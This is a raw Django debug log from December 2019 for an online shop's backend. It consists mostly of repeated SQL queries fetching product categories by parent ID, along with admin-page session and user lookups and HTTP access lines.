"shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-18 14:12:10,884 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-18 14:12:10,888 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-18 14:12:10,892 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-18 14:12:10,896 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-18 14:12:10,898 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-18 14:12:10,900 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-18 14:12:10,903 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-18 14:12:10,905 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [18/Dec/2019 14:12:10] "GET /api/v1/categories/ HTTP/1.0" 200 15396 DEBUG 2019-12-18 14:12:33,430 utils 4252 140031721535232 (0.003) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-18T14:12:33.420686+00:00'::timestamptz AND "django_session"."session_key" = '8ojyyz7puuibh7rtqntt8ci0gyabthm9'); args=(datetime.datetime(2019, 12, 18, 14, 12, 33, 420686, tzinfo=), '8ojyyz7puuibh7rtqntt8ci0gyabthm9') DEBUG 2019-12-18 14:12:33,433 utils 4252 140031721535232 (0.001) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) DEBUG 2019-12-18 14:12:33,435 utils 4252 140031721535232 (0.000) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 8; args=(8,) DEBUG 2019-12-18 14:12:33,444 utils 4252 140031721535232 (0.003) SELECT "auth_group"."id", "auth_group"."name" FROM "auth_group" INNER JOIN "auth_user_groups" ON ("auth_group"."id" = "auth_user_groups"."group_id") WHERE "auth_user_groups"."user_id" = 8; args=(8,) DEBUG 2019-12-18 14:12:33,451 utils 4252 140031721535232 (0.004) SELECT "auth_permission"."id", "auth_permission"."name", "auth_permission"."content_type_id", "auth_permission"."codename" FROM "auth_permission" INNER JOIN "auth_user_user_permissions" ON ("auth_permission"."id" = "auth_user_user_permissions"."permission_id") INNER JOIN "django_content_type" ON ("auth_permission"."content_type_id" = "django_content_type"."id") WHERE "auth_user_user_permissions"."user_id" = 8 ORDER BY "django_content_type"."app_label" ASC, "django_content_type"."model" ASC, "auth_permission"."codename" ASC; args=(8,) DEBUG 2019-12-18 14:12:33,457 utils 4252 140031721535232 (0.000) SELECT "django_content_type"."id", "django_content_type"."app_label", "django_content_type"."model" FROM "django_content_type" WHERE ("django_content_type"."app_label" = 'auth' AND "django_content_type"."model" = 'user'); args=('auth', 'user') DEBUG 2019-12-18 14:12:33,525 utils 4252 140031721535232 (0.002) DECLARE "_django_curs_140031721535232_1" NO SCROLL CURSOR WITH HOLD FOR SELECT "auth_group"."id", "auth_group"."name" FROM "auth_group" ORDER BY "auth_group"."name" ASC; args=() DEBUG 2019-12-18 14:12:33,537 utils 4252 140031721535232 (0.001) DECLARE "_django_curs_140031721535232_2" NO SCROLL CURSOR WITH HOLD FOR SELECT "auth_permission"."id", "auth_permission"."name", "auth_permission"."content_type_id", "auth_permission"."codename", "django_content_type"."id", "django_content_type"."app_label", "django_content_type"."model" FROM "auth_permission" INNER JOIN "django_content_type" ON ("auth_permission"."content_type_id" = "django_content_type"."id") ORDER BY "django_content_type"."app_label" ASC, "django_content_type"."model" ASC, "auth_permission"."codename" ASC; args=() DEBUG 2019-12-18 14:12:33,594 utils 4252 140031721535232 (0.001) UPDATE "django_session" SET "session_data" = 'YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', "expire_date" = '2020-01-01T14:12:33.592707+00:00'::timestamptz WHERE "django_session"."session_key" = '8ojyyz7puuibh7rtqntt8ci0gyabthm9'; args=('YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', datetime.datetime(2020, 1, 1, 14, 12, 33, 592707, tzinfo=), '8ojyyz7puuibh7rtqntt8ci0gyabthm9') [18/Dec/2019 14:12:33] "GET /auth/user/8/change/ HTTP/1.0" 200 15479 [18/Dec/2019 14:12:33] "GET /static/admin/js/admin/DateTimeShortcuts.js HTTP/1.0" 200 20218 [18/Dec/2019 14:12:33] "GET /static/admin/js/calendar.js HTTP/1.0" 200 7777 [18/Dec/2019 14:12:34] "GET /static/admin/css/forms.css HTTP/1.0" 304 0 [18/Dec/2019 14:12:34] "GET /static/admin/js/SelectBox.js HTTP/1.0" 200 5753 DEBUG 2019-12-18 14:12:34,227 utils 4252 140031721535232 (0.005) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-18T14:12:34.212309+00:00'::timestamptz AND "django_session"."session_key" = '8ojyyz7puuibh7rtqntt8ci0gyabthm9'); args=(datetime.datetime(2019, 12, 18, 14, 12, 34, 212309, tzinfo=), '8ojyyz7puuibh7rtqntt8ci0gyabthm9') [18/Dec/2019 14:12:34] "GET /static/admin/js/change_form.js HTTP/1.0" 304 0 DEBUG 2019-12-18 14:12:34,231 utils 4252 140031721535232 (0.002) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) [18/Dec/2019 14:12:34] "GET /jsi18n/ HTTP/1.0" 200 3223 [18/Dec/2019 14:12:34] "GET /static/admin/js/SelectFilter2.js HTTP/1.0" 200 12322 [18/Dec/2019 14:12:34] "GET /static/admin/css/widgets.css HTTP/1.0" 304 0 [18/Dec/2019 14:12:34] "GET /static/admin/js/prepopulate_init.js HTTP/1.0" 304 0 [18/Dec/2019 14:12:34] "GET /static/admin/img/selector-icons.svg HTTP/1.0" 200 3291 [18/Dec/2019 14:12:34] "GET /static/admin/img/icon-unknown.svg HTTP/1.0" 200 655 [18/Dec/2019 14:12:34] "GET /static/admin/img/icon-unknown-alt.svg HTTP/1.0" 200 655 [18/Dec/2019 14:12:34] "GET /static/admin/img/icon-calendar.svg HTTP/1.0" 200 1086 [18/Dec/2019 14:12:34] "GET /static/admin/img/icon-clock.svg HTTP/1.0" 200 677 Not Found: /api/api-token-auth/ [18/Dec/2019 14:12:58] "OPTIONS /api/api-token-auth/ HTTP/1.0" 404 6484 Not Found: /api/api-token-auth/ [18/Dec/2019 14:14:07] "OPTIONS /api/api-token-auth/ HTTP/1.0" 404 6484 [18/Dec/2019 14:15:09] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-18 14:17:14,339 utils 4252 140031492613888 (0.005) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-18 14:17:14,350 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-18 14:17:14,356 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-18 14:17:14,360 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-18 14:17:14,366 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-18 14:17:14,370 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-18 14:17:14,374 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-18 14:17:14,379 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-18 14:17:14,383 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-18 14:17:14,389 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-18 14:17:14,393 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-18 14:17:14,397 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-18 14:17:14,401 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-18 14:17:14,406 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-18 14:17:14,415 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-18 14:17:14,422 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-18 14:17:14,427 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-18 14:17:14,432 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-18 14:17:14,436 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-18 14:17:14,442 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-18 14:17:14,447 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-18 14:17:14,451 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-18 14:17:14,455 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-18 14:17:14,459 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-18 14:17:14,463 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-18 14:17:14,469 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-18 14:17:14,472 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-18 14:17:14,476 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-18 14:17:14,480 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-18 14:17:14,484 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-18 14:17:14,490 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-18 14:17:14,495 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-18 14:17:14,499 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-18 14:17:14,503 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-18 14:17:14,507 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-18 14:17:14,514 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-18 14:17:14,518 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-18 14:17:14,522 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-18 14:17:14,525 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-18 14:17:14,529 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-18 14:17:14,533 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-18 14:17:14,539 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-18 14:17:14,543 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", 